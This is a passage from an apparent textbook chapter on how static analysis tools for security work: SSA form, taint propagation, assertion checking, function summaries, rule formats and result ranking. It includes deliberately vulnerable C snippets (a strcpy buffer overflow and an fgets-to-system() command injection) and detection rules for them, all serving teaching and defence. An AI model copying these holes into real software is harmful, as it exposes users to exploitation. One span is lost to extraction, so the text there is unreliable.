a combination of dataflow analysis (discussed next) and data type analysis to limit the set of potential functions that can be invoked from a call site. If the program loads code modules dynamically at runtime, there is no way to be sure that the control flow graph is complete because the program might run code that is not visible at the time of analysis. For software systems that span multiple programming languages or consist of multiple cooperating processes, a static analysis tool will ideally stitch together a control flow graph that represents the connections between the pieces. For some systems, the configuration files hold the data needed to span the call graphs in different environments. Tracking Dataflow Dataflow analysis algorithms examine the way data move through a program. Compilers perform dataflow analysis to allocate registers, remove dead code, and perform many other optimizations. Dataflow analysis usually involves traversing a function’s control flow graph and noting where data values are generated and where they are used. Converting a function to Static Single Assignment (SSA) form is useful for many dataflow problems. A function in SSA form is allowed to assign a value to a variable only once. To accommodate this restriction, new variables must be introduced into the program. In the compiler literature, the new variables are usually represented by appending a numeric subscript to the original variable’s name, so if the variable x is assigned three times, the rewritten program will refer to variables x1, x2, and x3. SSA form is valuable because, given any variable in the program, it is easy to determine where the value of the variable comes from. This property has many applications. For example, if an SSA variable is ever assigned a constant value, the constant can replace all uses of the SSA variable. This technique is called constant propagation. Constant propagation by itself is useful for finding security problems such as hard-coded passwords or encryption keys. Example 4.5 lists an excerpt from the Tiny Encryption Algorithm (TEA). The excerpt first appears as it normally would in the program source text and next appears in SSA form. This example is simple because it is straight-line code without any branches. 4.1 Building a Model 81 Example 4.5 An excerpt from the TEA encryption algorithm, both in its regular source code form and in static single assignment form. Regular source code form: sum = sum + delta ; sum = sum & top; y = y + (z<<4)+k[0] ^ z+sum ^ (z>>5)+k[1]; y = y & top; z = z + (y<<4)+k[2] ^ y+sum ^ (y>>5)+k[3]; z = z & top; SSA form: sum2 = sum1 + delta1 ; sum3 = sum2 & top1; y2 = y1 + (z1<<4)+k[0]1 ^ z1+sum3 ^ (z1>>5)+k[1]1; y3 = y2 & top1; z2 = z1 + (y3<<4)+k[2]1 ^ y3+sum3 ^ (y3>>5)+k[3]1; z3 = z2 & top1; If a variable is assigned different values along different control flow paths, in SSA form, the variable must be reconciled at the point where the control flow paths merge. SSA accomplishes this merge by introducing a new version of the variable and assigning the new version the value from one of the two control flow paths. The notational shorthand for this merge point is called a φ-function. The φ-function stands in for the selection of the appropriate value, depending upon the control flow path that is executed. Example 4.6 gives an example in which conversion to SSA form requires introducing a φ function. Example 4.6 Another example of conversion to SSA form. The code is shown first in its regular source form and then in its SSA form. In this case, two control flow paths merge at the bottom of the if block, and the variable tail must be reconciled using a φ-function. Regular source form: if (bytesRead < 8) { tail = (byte) bytesRead; } SSA form: if (bytesRead1 < 8) { tail2 = (byte) bytesRead1; } tail3 = φ(tail1, tail2); 82 Chapter 4 Static Analysis Internals Taint Propagation Security tools need to know which values in a program an attacker could potentially control. Using dataflow to determine what an attacker can control is called taint propagation. It requires knowing where information enters the program and how it moves through the program. Taint propagation is the key to identifying many input validation and representation defects. For example, a program that contains an exploitable buffer overflow vulnerability almost always contains a dataflow path from an input function to a vulnerable operation. We discuss taint propagation further when we look at analysis algorithms and then again when we look at rules. The concept of tracking tainted data is not restricted to static analysis tools. Probably the most well-known implementation of dynamic taint propagation is Perl’s taint mode, which uses a runtime mechanism to make sure that user-supplied data are validated against a regular expression before they are used as part of a sensitive operation. Pointer Aliasing Pointer alias analysis is another dataflow problem. The purpose of alias analysis is to understand which pointers could possibly refer to the same memory location. Alias analysis algorithms describe pointer relationships with terms such as “must alias,” “may alias,” and “cannot alias.” Many compiler optimizations require some form of alias analysis for correctness. For example, a compiler would be free to reorder the following two statements only if the pointers p1 and p2 do not refer to the same memory location: *p1 = 1; *p2 = 2; For security tools, alias analysis is important for performing taint propagation. A flow-sensitive taint-tracking algorithm needs to perform alias analysis to understand that data flow from getUserInput() to processInput() in the following code: p1 = p2; *p1 = getUserInput(); processInput(*p2); 4.2 Analysis Algorithms 83 It is common for static analysis tools to assume that pointers—at least pointers that are passed as function arguments—do not alias. This assumption seems to hold often enough for many tools to produce useful results, but it could cause a tool to overlook important results. 4.2 Analysis Algorithms The motivation for using advanced static analysis algorithms is to improve context sensitivity—to determine the circumstances and conditions under which a particular piece of code runs. Better context sensitivity enables a better assessment of the danger the code represents. It’s easy to point at all calls to strcpy() and say that they should be replaced, but it’s much harder to call special attention to only the calls to strcpy() that might allow an attacker to overflow a buffer. Any advanced analysis strategy consists of at least two major pieces: an intraprocedural analysis component for analyzing an individual function, and an interprocedural analysis component for analyzing interaction between functions. Because the names intraprocedural and interprocedural are so similar, we use the common vernacular terms local analysis to mean intraprocedural analysis, and global analysis to mean interprocedural analysis. Figure 4.6 diagrams the local analysis and global analysis components, and associates the major data structures commonly used by each. Analysis Algorithm Local Analysis AST Control Flow Graph Global Analysis Call Graph Figure 4.6 An analysis algorithm includes a local component and a global component. 84 Chapter 4 Static Analysis Internals Checking Assertions Many security properties can be stated as assertions that must be true for the program to be secure. To check for a buffer overflow in the following line of code: strcpy(dest, src); imagine adding this assertion to the program just before the call to strcpy(): assert(alloc_size(dest) > strlen(src)); If the program logic guarantees that this assertion will always succeed, no buffer overflow is possible.1 If there are a set of conditions under which the assertion might fail, the analyzer should report a potential buffer overflow. This same assertion-based approach works equally well for defining the requirements for avoiding SQL injection, cross-site scripting, and most of the other vulnerability categories we discuss in this book. For the remainder of this section, we treat static analysis as an assertionchecking problem. Choosing the set of assertions to make is the topic of Section 4.3, leaving this section to discuss how assertion checking can be performed. Drawing a distinction between the mechanics of performing the check and the particulars of what should be checked is valuable for more than just explicative purposes; it is also a good way to build a static analysis tool. By separating the checker from the set of things to be checked, the tool can quickly be adapted to find new kinds of problems or prevented from reporting issues that are not problems. From an engineering standpoint, designing a checker and deciding what to check are both major undertakings, and convoluting them would make for an implementation quagmire. We typically see three varieties of assertions that arise from security properties: • The most prevalent forms of security problems arise from programmers who trust input when they should not, so a tool needs to check assertions related to the level of trust afforded to data as they move through 1. For the purposes of this example, we have made up a function named alloc_size() that returns the number of allocated bytes that its argument points to. Note that the size of dest must be strictly greater than the string length of src. If the destination buffer is exactly the same size as the source string, strcpy() will write a null terminator outside the bounds of dest. 4.2 Analysis Algorithms 85 the program. These are the taint propagation problems. SQL injection and cross-site scripting are two vulnerability types that will cause a tool to make assertions about taint propagation. In the simplest scenario, a data value is either tainted (potentially controlled by an attacker) or untainted. Alternatively, a piece of data might carry one or more particular kinds of taint. An attacker might be able to control the contents of a buffer but not the size of the buffer, for example. • Looking for exploitable buffer overflow vulnerabilities leads to assertions that are similar to the ones that arise from taint propagation, but determining whether a buffer can be overflowed requires tracking more than just whether tainted data are involved; the tool also needs to know the size of the buffer and the value used as an index. We term these range analysis problems because they require knowing the range of potential values a variable (or a buffer size) might have. • In some cases, tools are less concerned with particular data values and more concerned with the state of an object as the program executes. This is called type state—variables can have a different type at each point in the code. For example, imagine a memory region as being in either the allocated state (after malloc() returns a pointer to it ) or the freed state (entered when it is passed to the function free()). If a program gives up all references to the memory while it is in the allocated state, the memory is leaked. If a pointer to the memory is passed to free() when it is in the freed state, a double free vulnerability is present. Many such temporal safety properties can be expressed as small finitestate automata (state machines). Naïve Local Analysis With assertion checking in mind, we approach static analysis from a naïve perspective, demonstrate the difficulties that arise, and then discuss how static analysis tools overcome these difficulties. Our effort here is to provide an informal perspective on the kinds of issues that make static analysis challenging. Consider a simple piece of code: x = 1; y = 1; assert(x < y); 86 Chapter 4 Static Analysis Internals How could a static analysis tool evaluate the assertion? One could imagine keeping track of all the facts we know about the code before each statement is executed, as follows: x = 1; y = 1; assert (x < y); {} (no facts) {x=1} { x = 1, y = 1 } When the static analysis tool reaches the assertion, it can evaluate the expression a < b in the context of the facts it has collected. By substituting the variable’s values in the assertion, the expression becomes this: 1<1 This is always false, so the assertion will never hold and the tool should report a problem with the code. This same technique could also be applied even if the values of the variables are nonconstant: x = v; y = v; assert(x < y); Again tracking the set of facts known before each statement is executed, we have this: x = v; y = v; assert (x < y); {} (no facts) {x=v} { x = v, y = v } Substituting the variable values in the assert statement yields this: v 0) However, the assert statement does not require this. If we are interested in having a program reach a final state r, we can write a predicate transformer for deriving the weakest precondition for an assert statement as follows: WP(assert(p), r) = p ∧ r Predicate transformers are appealing because, by generating a precondition for a body of code, they abstract away the details of the program and create a summary of the requirements that the program imposes on the caller. Model Checking For temporal safety properties, such as “memory should be freed only once” and “only non-null pointers should be dereferenced,” it is easy to represent the property being checked as a small finite-state automaton. Figure 4.7 shows a finite-state automaton for the property “memory should be freed only once.” A model checking approach accepts such properties as specifications, transforms the program to be checked into an automaton (called the model), and then compares the specification to the model. For example, in Figure 4.7, if the model checker can find a variable and a path through the program that will cause the specification automaton to reach its error state, the model checker has identified the potential for a double free vulnerability. 4.2 Analysis Algorithms 91 start initial state free(x) freed free(x) error (other operations) (other operations) Figure 4.7 A finite-state automaton for the temporal safety property “memory should be freed only once.” Global Analysis The simplest possible approach to global analysis is to ignore the issue, to assume that all problems will evidence themselves if the program is examined one function at a time. This is a particularly bad assumption for many security problems, especially those related to input validation and representation, because identifying these problems often requires looking across function boundaries. Example 4.7 shows a program that contains a buffer overflow vulnerability. To identify the vulnerability, a tool needs to track that an unbounded amount of data from the environment (argv[0]) are being passed from main() to setname() and copied into a fixed-size buffer. Just about all advanced security tools make an effort to identify bugs that involve more than one function. Example 4.7 Accurately identifying this buffer overflow vulnerability requires looking across function boundaries. static char progName[128]; void setname(char* newName) { strcpy(progName, newName); } int main(int argc, char* argv[]) { setname(argv[0]); } 92 Chapter 4 Static Analysis Internals The most ambitious approach to global analysis is whole-program analysis, whose objective is to analyze every function with a complete understanding of the context of its calling functions. This is an extreme example of a context-sensitive analysis, whose objective is to take into account the context of the calling function when it determines the effects of a function call. A conceptually simple way to achieve whole-program analysis is inlining, replacing each function call in the program with the definition of the called function. (Recursion presents a challenge.) Other approaches are also possible, including the use a stack-based analysis model. Regardless of the technique, whole-program analysis can require a lot of time, a lot of memory, or both. A more flexible approach to global analysis is to leverage a local analysis algorithm to create function summaries. With a function summary approach, when a local analysis algorithm encounters a function call, the function’s summary is applied as a stand-in for the function. A function’s summary can be very precise (and potentially very complex) or very imprecise (and presumably less complex), allowing the summary-generation and storage algorithm to make a trade-off between precision and scalability. A function summary might include both requirements that the calling context must meet (preconditions) and the effect that the function has had on the calling context when it returns (postconditions). Example 4.8 shows a summary for the C standard library function memcpy(). In English, the summary says: “memcpy() requires that its callers ensure that the size of the dest buffer and the size of the src buffer are both greater than or equal to the value of the len parameter. When it returns, memcpy() guarantees that the values in dest will be equal to the values in src in locations 0 through the value of len minus 1.” Example 4.8 A summary for the C function memcpy(). memcpy(dest, src, len) [ requires: ( alloc_size(dest) >= len ) ∧ ( alloc_size(src) >= len ) ensures: ∀ i ∈ 0 .. len-1: dest[i]' == src[i] ] Building and using function summaries often implies that global analysis is carried out by a work-queue algorithm that uses a local analysis subroutine 4.2 Analysis Algorithms 93 to find bugs and produce function summaries. Example 4.9 gives pseudocode for two procedures that together implement a work-queue algorithm for performing global analysis. The analyze_program() procedure accepts two parameters: a program to be analyzed and a set of function summaries. The initial set of summaries might be characterizations for library functions. It first builds a call graph, then queues up all the functions in the program, and then pulls functions off the queue and analyzes each one until the queue is empty. The analyze_function() procedure relies on a local analysis algorithm (not shown) that checks the function for vulnerabilities and also updates the function summary, if necessary. If a function’s summary is updated, all the callers of the function need to be analyzed again so that they can use the new summary. Depending on the specifics of the analysis, it might be possible to speed up analyze_program() by adjusting the order in which individual functions are analyzed. Example 4.9 Pseudocode for a global analysis algorithm using function summaries. analyze_program(p, summaries) { cg = build_callgraph(p) for each function f in p { add f to queue } while (queue is not empty) { f = first function in queue remove f from queue analyze_function(f, queue, cg, summaries); } } analyze_function(f, queue, cg, summaries) { old = get summary for f from summaries do_local_analysis(f, summaries); new = get summary for f from summaries if (old != new) { for each function g in cg that calls f { if (g is not in queue) { add g to queue } } } } 94 Chapter 4 Static Analysis Internals Research Tools The following is a brief overview of some of the tools that have come out of research labs and universities in the last few years:2 • ARCHER is a static analysis tool for checking array bounds. (The name stands for ARray CHeckER.) ARCHER uses a custom-built solver to perform a path-sensitive interprocedural analysis of C programs. It has been used to find more than a dozen security problems in Linux, and it has found hundreds of array bounds errors in OpenBSD, Sendmail, and PostgreSQL [Xie et al., 2003]. • The tool BOON applies integer range analysis to determine whether a C program is capable of indexing an array outside its bounds [Wagner et al., 2000]. Although it is capable of finding many errors that lexical analysis tools would miss, the checker is still imprecise: It ignores statement order, it can’t model interprocedural dependencies, and it ignores pointer aliasing. • Inspired by Perl’s taint mode, CQual uses type qualifiers to perform a taint analysis to detect format string vulnerabilities in C programs [Foster et al., 2002]. CQual requires a programmer to annotate a small number of variables as either tainted or untainted, and then uses typeinference rules (along with preannotated system libraries) to propagate the qualifiers. After the qualifiers have been propagated, the system can detect format string vulnerabilities by type checking. • The Eau Claire tool uses a theorem prover to create a general specificationchecking framework for C programs [Chess, 2002]. It can be used to find such common security problems as buffer overflows, file access race conditions, and format string bugs. The system checks the use of standard library functions using prewritten specifications. Developers can also use specifications to ensure that function implementations behave as expected. Eau Claire is built on the same philosophical foundation as the extended static checking tool ESC/Java2 [Flanagan et al., 2002]. • LAPSE, short for Lightweight Analysis for Program Security in Eclipse, is an Eclipse plug-in targeted at detecting security vulnerabilities in J2EE applications. It performs taint propagation to connect sources of Web input with potentially sensitive operations. It detects vulnerabilities such as SQL injection, cross-site scripting, cookie poisoning, and parameter manipulation [Livshits and Lam, 2005]. 2. Parts of this section originally appeared in IEEE Security & Privacy Magazine as part of an article coauthored with Gary McGraw [Chess and McGraw, 2004]. 4.2 Analysis Algorithms 95 • MOPS (MOdel checking Programs for Security properties) takes a model checking approach to look for violations of temporal safety properties in C programs [Chen and Wagner, 2002]. Developers can model their own safety properties, and MOPS has been used to identify privilege management errors, incorrect construction of chroot jails, file access race conditions, and ill-conceived temporary file schemes in large-scale systems, such as the Red Hat Linux 9 distribution [Schwarz et al., 2005]. • SATURN applies Boolean satisfiability to detect violations of temporal safety properties. It uses a summary-based approach to interprocedural analysis. It has been used to find more than 100 memory leaks and locking problems in Linux [Xie and Aiken, 2005]. • Splint extends the lint concept into the security realm [Larochelle and Evans, 2001]. Without adding any annotations, developers can perform basic lint-like checks. By adding annotations, developers can enable Splint to find abstraction violations, unannounced modifications to global variables, and possible use-before-initialization errors. Splint can also reason about minimum and maximum array bounds accesses if it is provided with function preconditions and postconditions. • Pixy detects cross-site scripting vulnerabilities in PHP programs [Jovanovic et al., 2006]. The authors claim that their interprocedural context and flow-sensitive analysis could easily be applied to other taintstyle vulnerabilities such as SQL injection and command injection. • The xg++ tool uses a template-driven compiler extension to attack the problem of finding kernel vulnerabilities in the Linux and OpenBSD operating systems [Ashcraft and Engler, 2002]. The tool looks for locations where the kernel uses data from an untrusted source without checking first, methods by which a user can cause the kernel to allocate memory and not free it, and situations in which a user could cause the kernel to deadlock. Similar techniques applied to general code quality problems such as null pointer dereferences led the creators of xg++ to form a company: Coverity. A number of static analysis approaches hold promise but have yet to be directly applied to security. Some of the more noteworthy ones include ESP (a large-scale property verification approach) [Das et al., 2002] and model checkers such as SLAM [Ball et al., 2001] and BLAST [Henzinger et al., 2003]. 96 Chapter 4 Static Analysis Internals Prove It Throughout this discussion, we have quickly moved from an equation such as (x < y) ∧ (x = v) ∧ ¬(x < y) to the conclusion that an assertion will succeed or fail. For a static analysis tool to make this same conclusion, it needs to use a constraint solver. Some static analysis tools have their own specialized constraint solvers, while others use independently developed solvers. Writing a good solver is a hard problem all by itself, so if you create your own, be sure to create a well-defined interface between it and your constraint-generation code. Different solvers are good for different problems, so be sure your solver is well matched to the problems that need to be solved. Popular approaches to constraint solving include the Nelson-Oppen architecture for cooperating decision procedures [Nelson, 1981] as implemented by Simplify [Detlefs et al., 1996]. Simplify is used by the static analysis tools Esc/Java [Flanagan et al., 2002] and Eau Claire [Chess, 2002]. In recent years, Boolean satisfiability solvers (SAT solvers) such as zChaff [Moskewicz et al., 2001] have become efficient enough to make them effective for static analysis purposes. The static analysis tool SATURN [Xie and Aiken, 2005] uses zChaff. Packages for manipulating binary decision diagrams (BDDs), such as BuDDy (, are also seeing use in tools such as Microsoft SLAM [Ball et al., 2001]. Examples of static analysis tools that use custom solvers include the buffer overflow detectors ARCHER [Xie et al., 2003] and BOON [Wagner et al., 2000]. 4.3 Rules The rules that define what a security tool should report are just as important, if not more important, than the analysis algorithms and heuristics that the tool implements. The analysis algorithms do the heavy lifting, but the rules call the shots. Analysis algorithms sometimes get lucky and reach the right conclusions for the wrong reasons, but a tool can never report a problem outside its rule set. Early security tools were sometimes compared simply by counting the number of rules that each tool came packaged with by default. More recent static analysis tools are harder to compare. Rules might work together to 4.3 Rules 97 detect an issue, and an individual rule might refer to abstract interfaces or match method names against a regular expression. Just as more code does not always make a better program, more rules do not always make a better static analysis tool. Code quality tools sometimes infer rules from the code they are analyzing. If a program calls the same method in 100 different locations, and in 99 of those locations it pays attention to the method’s return value, there is a decent chance that there is a bug at the single location that does not check the return value. This statistical approach to inferring rules does not work so well for identifying security problems. If a programmer did not understand that a particular construct represents a security risk, the code might uniformly apply the construct incorrectly throughout the program, which would result in a 100% false negative rate given only a statistical approach. Rules are not just for defining security properties. They’re also used to define any program behavior not explicitly included in the program text, such as the behavior of any system or third-party libraries that the program uses. For example, if a Java program uses the java.util.Hashtable class, the static analysis tool needs rules that define the behavior of a Hashtable object and all its methods. It’s a big job to create and maintain a good set of modeling rules for system libraries and popular third-party libraries. Rule Formats Good static analysis tools externalize the rules they check so that rules can be added, subtracted, or altered without having to modify the tool itself. The best static analysis tools externalize all the rules they check. In addition to adjusting the out-of-the-box behavior of a tool, an external rules interface enables the end user to add checks for new kinds of defects or to extend existing checks in ways that are specific to the semantics of the program being analyzed. Specialized Rule Files Maintaining external files that use a specialized format for describing rules allows the rule format to be tailored to the capabilities of the analysis engine. Example 4.10 shows the RATS rule describing a command injection problem related to the system call system(). RATS will report a violation of the rule whenever it sees a call to system() where the first argument is not constant. It gives the function name, the argument number for the untrusted buffer (so that it can avoid reporting cases in which the argument is a constant), and the severity associated with a violation of the rule. 98 Chapter 4 Static Analysis Internals Example 4.10 A rule from RATS: calling system() is a risk if the first argument is not a string literal. system 1 High Example 4.11 shows a rule from Fortify Source Code Analysis (SCA). The rule also detects command injection vulnerabilities related to calling system(), but this rule fires only if there is a path through the program through which an attacker could control the first argument and if that argument value has not been validated to prevent command injection. The Fortify rule contains more metadata than the RATS example, including a unique rule identifier and kingdom, category, and subcategory fields. As in the RATS example, it contains a default severity associated with violating the rule. It also contains a link to a textual description of the problem addressed by the rule. Example 4.11 A rule from Fortify Source Code Analysis. Calling system() is a risk if the first argument can be controlled by an attacker and has not been validated. C Core AA212456-92CD-48E0-A5D5-E74CC26A276F Input Validation and Representation Command Injection 4.0 0 system 4.3 Rules 99 Annotations In some cases, it is preferable to have rules appear directly in the text of the program, in the form of annotations. If special rules govern the use of a particular module, putting the rules directly in the module (or the header file for the module) is a good way to make sure that the rules are applied whenever the module is used. Annotations are often more concise than rules that appear in external files because they do not have to explain the context they apply to; an annotation’s context is provided by the code around it. For example, instead of having to specify the name of a function, an annotation can simply appear just before the function declaration. This tight binding to the source code has its disadvantages, too. For example, if the people performing the analysis are not the owners or maintainers of the code, they might not be allowed to add permanent annotations. One might be able to overcome this sort of limitation by creating special source files that contain annotations almost exclusively and using these source files only for the purpose of analysis. Languages such as Java and C# have a special syntax for annotations. For languages that do not have an annotation syntax, annotations usually take the form of specially formatted comments. Example 4.12 shows an annotation written in the Java Modeling Language (JML). Although Sun has added syntax for annotations as of Java 1.5, annotations for earlier versions of Java must be written in comments. Annotations are useful for more than just static analysis. A number of dynamic analysis tools can also use JML annotations. Example 4.12 A specification for the method read() written in JML. The specification requires the reader to be in a valid state when read() is called. It stipulates that a call to read() can change the state of the reader, and it ensures that the return value is in the range 1 to 65535. /*@ public normal_behavior @ requires valid; @ assignable state; @ ensures -1 <= \result && \result <= 65535; @*/ public int read(); Bill Pugh, a professor at the University of Maryland and one of the authors and maintainers of FindBugs, has proposed a set of standard Java 1.5 annotations such as @NonNull and @CheckForNull that would be useful 100 Chapter 4 Static Analysis Internals for static analysis tools [Pugh, 2006]. The proposal might grow to include annotations for taint propagation, concurrency, and internationalization. Microsoft has its own version of source annotation: the Microsoft Standard Annotation Language (SAL). SAL works with the static analysis option built into Visual Studio 2005. You can use it to specify the ways a function uses and modifies its parameters, and the relationships that exist between parameters. SAL makes it particularly easy to state that the value of one parameter is used as the buffer size of another parameter, a common occurrence in C. Example 4.13 shows a function prototype annotated with SAL. Quite a few of the commonly used header files that ship with Visual Studio include SAL annotations. Example 4.13 A function prototype annotated with Microsoft’s SAL. The annotation (in bold) indicates that the function will write to the variable buf but not read from it, and that the parameter sz gives the number of elements in buf. int fillBuffer( __out_ecount(sz) char* buf, size_t sz ); Other Rule Formats Another approach to rule writing is to expose the static analysis engine’s data structures and algorithms programmatically. FindBugs allows programmers to create native plug-ins that the analysis engine loads at runtime. To add a new bug pattern, a programmer writes a new visitor class and drops it in the plug-ins directory. FindBugs instantiates the class and passes it a handle to each class in the program being analyzed. Although a plug-in approach to rule writing is quite flexible, it sets a high bar for authors: A rule writer must understand both the kind of defect he or she wants to detect and the static analysis techniques necessary to detect it. One of the first static analysis tools we wrote was a checker that looked for testability problems in hardware designs written in Verilog. (Brian wrote it back when he worked at Hewlett-Packard.) It used a scripting language to expose its analysis capabilities. Users could write TCL scripts and call into a set of functions for exploring and manipulating the program representation. This approach requires less expertise on the part of rule writers, but user feedback was largely negative. Users made alterations to the default rule 4.3 Rules 101 scripts, and then there was no easy way to update the default rule set. Users wrote scripts that took a long time to execute because they did not understand the computational complexity of the underlying operations they were invoking, and they were not particularly happy with the interface because they were being asked not only to specify the results they wanted to see, but also to formulate the best strategy for achieving them. Just as a database exposes the information it holds through a query language instead of directly exposing its data structures to the user, we believe that a static analysis tool should provide a good abstraction of its capabilities instead of forcing the user to understand how to solve static analysis problems. The most innovative approach to rule writing that we have seen in recent years is Program Query Language (PQL) [Martin et al., 2005]. PQL enables users to describe the sequence of events they want to check for using the syntax of the source language. Example 4.14 gives a PQL query for identifying a simple flavor of SQL injection. Example 4.14 A PQL query for identifying a simple variety of SQL injection: When a request parameter is used directly as a database query. query simpleSQLInjection() uses object HttpServletRequest r; object Connection c; object String p; matches { p = r.getParameter(_); } replaces c.execute(p) with Util.CheckedSQL(c, p); Rules for Taint Propagation Solving taint propagation problems with static analysis requires a variety of different rule types. Because so many security problems can be represented as taint propagation problems, we outline the various taint propagation rule types here: • Source rules define program locations where tainted data enter the system. Functions named read() often introduce taint in an obvious manner, but many other functions also introduce taint, including getenv(), getpass(), and even gets(). • Sink rules define program locations that should not receive tainted data. For SQL injection in Java, Statement.executeQuery() is a sink. For 102 Chapter 4 Static Analysis Internals buffer overflow in C, assigning to an array is a sink, as is the function strcpy(). • Pass-through rules define the way a function manipulates tainted data. For example, a pass-through rule for the java.lang.String method trim() might explain “if a String s is tainted, the return value from calling s.trim() is similarly tainted.” • A cleanse rule is a form of pass-through rule that removes taint from a variable. Cleanse rules are used to represent input validation functions. • Entry-point rules are similar to source rules, in that they introduce taint into the program, but instead of introducing taint at points in the program where the function is invoked, entry-point functions are invoked by an attacker. The C function main() is an entry point, as is any Java method named doPost() in an HttpServlet object. To see how the rule types work together to detect a vulnerability, consider Figure 4.8. It shows a source rule, a pass-through rule, and a sink rule working together to detect a command injection vulnerability. A source rule carries the knowledge that fgets() taints its first argument (buf). Dataflow analysis connects one use of buf to the next, at which point a pass-through rule allows the analyzer to move the taint through the call to strcpy() and taint othr. Dataflow analysis connects one use of othr to the next, and finally a sink rule for system() reports a command injection vulnerability because othr is tainted. 1 if ( fgets ( buf , sizeof(buf), stdin) == buf ) { 1 A source rule for fgets() taints buf othr 2 Dataflow analysis connects uses of buf 2 3 A pass-through rule for strcpy taints 3 strcpy ( othr , buf ); 4 5 system ( othr ); } 4 Dataflow analysis connects uses of othr 5 Because othr is tainted, a sink rule for system() reports a command injection vulnerability Figure 4.8 Three dataflow rules work together to detect a command injection vulnerability. 4.3 Rules 103 In its simplest form, taint is a binary attribute of a piece of data—the value is either tainted or untainted. In reality, input validation problems are not nearly so clear cut. Input can be trusted for some purposes, but not for others. For example, the argument parameters passed to a C program’s main() function are not trustworthy, but most operating systems guarantee that the strings in the argv array will be null-terminated, so it is safe to treat them as strings. To represent the fact that data can be trusted for some purposes but not for others, different varieties of tainted data can be modeled as carriers of different taint flags. Taint flags can be applied in a number of different ways. First, different source rules can introduce data with different taint flags. Data from the network could be marked FROM_NETWORK, and data from a configuration file might be marked FROM_CONFIGURATION. If these taint flags are carried over into the static analysis output, they allow an auditor to prioritize output based on the source of the untrusted data. Second, sink functions might be dangerous only when reached by data carrying a certain type of taint. A cross-site scripting sink is vulnerable when it receives arbitrary user-controlled data, but not when it receives only numeric data. Source, sink, and pass-through rules can manipulate taint in either an additive or a subtractive manner. We have seen successful implementations of both approaches. In the subtractive case, source rules introduce data carrying all the taint flags that might possibly be of concern. Input validation functions are modeled with pass-through rules that strip the appropriate taint flags, given the type of validation they perform. Sink rules check for dangerous operations on tainted data or for tainted data escaping from the application tier (such as passing from business logic to back-end code) and trigger if any of the offending taint flags are still present. In the additive case, source rules introduce data tainted in a generic fashion, and inputvalidation functions add taint flags based on the kind of validation they perform, such as VALIDATED_XSS for a function that validates against crosssite scripting attacks. Sinks fill the same role as in the subtractive case, firing either when a dangerous operation is performed on an argument that does not hold an appropriate set of taint flags or when data leave the application tier without all the necessary taint flags. Rules in Print Throughout Part II, “Pervasive Problems,” and Part III, “Features and Flavors,” we discuss techniques for using static analysis to identify specific security problems in source code. These discussions take the form of 104 Chapter 4 Static Analysis Internals specially formatted callouts labeled “Static Analysis.” Many of these sections include a discussion of specific static analysis rules that you can use to solve the problem at hand. For the most part, formats that are easy for a computer to understand, such as the XML rule definition that appears earlier in this chapter, are not ideal for human consumption. For this reason, we introduce a special syntax here for defining rules. This is the rule syntax we use for the remainder of the book. Configuration Rules We specify configuration rules for XML documents with XPath expressions. The rule definitions also include a file pattern to control which files the static analysis tool applies the XPath expression to, such as web.xml or *.xml. Model Checking Rules Instead of giving their definitions textually, we present model checking rules using state machine diagrams similar to the one found earlier in this chapter. Each model checking diagram includes an edge labeled “start” that indicates the initial state the rule takes on, and has any number of transitions leading to other states that the analysis algorithm will follow whenever it encounters the code construct associated with the transition. Structural Rules We describe structural rules using the special language introduced in the sidebar earlier this chapter. Properties in the language correspond to common properties in source code, and most rules are straightforward to understand without any existing knowledge of the language. Taint Propagation Rules Taint propagation rules in the book include a combination of the following elements: • Method or function—Defines the method or function that the rule will match. All aspects of the rule are applied only to code constructs that match this element, which can include special characters, such as the wildcard (*) or the logical or operator (|). • Precondition—Defines conditions on the taint propagation algorithm’s state that must be met for the rule to trigger. Precondition statements typically specify which arguments to a function must not be tainted or which taint flags must or must not be present, so preconditions stand for 4.4 Reporting Results 105 sink rules. If the precondition is not met, the rule will trigger. In the case of sink rules, a violation of the precondition results in the static analysis tool reporting an instance of the vulnerability the rule represents. • Postcondition—Describes changes to the taint propagation algorithm’s state that occur when a method or function the rule matches is encountered. Postcondition statements typically taint or cleanse certain variables, such as the return value from the function or any of its arguments, and can also include assignment of taint flags to these variables. Postconditions represent source or passthrough information. • Severity—Allows the rule definition to specify the severity of the issues the taint propagation algorithm produces when a sink rule is triggered. In some cases, it is important to be able to differentiate multiple similar results that correspond to the same type of vulnerability. 4.4 Reporting Results Most of the academic research effort invested in static analysis tools is spent devising clever new approaches to identifying defects. But when the time comes for a tool to be put to work, the way the tool reports results has a major impact on the value the tool provides. Unless you have a lab full of Ph.D. candidates ready to interpret raw analyzer output, the results need to be presented in such a way that the user can make a decision about the correctness and importance of the result, and can take an appropriate corrective action. That action might be a code change, but it might also be an adjustment of the tool. Tool users tend to use the term false positive to refer to anything that might come under the heading “unwanted result.” Although that’s not the definition we use, we certainly understand the sentiment. From the user’s perspective, it doesn’t matter how fancy the underlying analysis algorithms are. If you can’t make sense of what the tool is telling you, the result is useless. In that sense, bad results can just as easily stem from bad presentation as they can from an analysis mistake. It is part of the tool’s job to present results in such a way that users can divine their potential impact. Simple code navigation features such as jumpto-definition are important. If a static analysis tool can be run as a plug-in inside a programmer’s integrated development environment (IDE), everyone wins: The programmer gets a familiar code navigation setup, and the static analysis tool developers don’t have to reinvent code browsing. 106 Chapter 4 Static Analysis Internals Auditors need at least three features for managing tool output: • Grouping and sorting results • Eliminating unwanted results • Explaining the significance of results We use the Fortify audit interface (Audit Workbench) to illustrate these features. Figure 4.9 shows the Audit Workbench main view. Figure 4.9 The Audit Workbench interface. Grouping and Sorting Results If users can group and sort issues in a flexible manner, they can often eliminate large numbers of unwanted results without having to review every issue individually. For example, if the program being analyzed takes some of its input from a trusted file, a user reviewing results will benefit greatly from a means by which to eliminate all results that were generated under the assumption that the file was not trusted. 4.4 Reporting Results 107 Because static analysis tools can generate a large number of results, users appreciate having results presented in a ranked order so that the most important results will most likely appear early in the review. Static analysis tools have two dimensions along which they can rank results. Severity gives the gravity of the finding, under the assumption that the tool has not made any mistakes. For example, a buffer overflow is usually a more severe security problem than a null pointer dereference. Confidence gives an estimate of the likelihood that the finding is correct. A tool that flags every call to strcpy() as a potential buffer overflow produces low confidence results. A tool that can postulate a method by which a call to strcpy() might be exploited is capable of producing higher confidence results. In general, the more assumptions a tool has to make to arrive at a result, the lower the confidence in the result. To create a ranking, a tool must combine severity and confidence scores for each result. Typically, severity and confidence are collapsed into a simple discrete scale of importance, such as Critical (C), High (H), Medium (M), and Low (L), as shown in Figure 4.10. This gives auditors an easy way to prioritize their work. Severity H M M L L L C H M C = Critical H = High M = Medium L = Low Confidence Figure 4.10 Severity and confidence scores are usually collapsed into a simple discrete scale of importance, such as 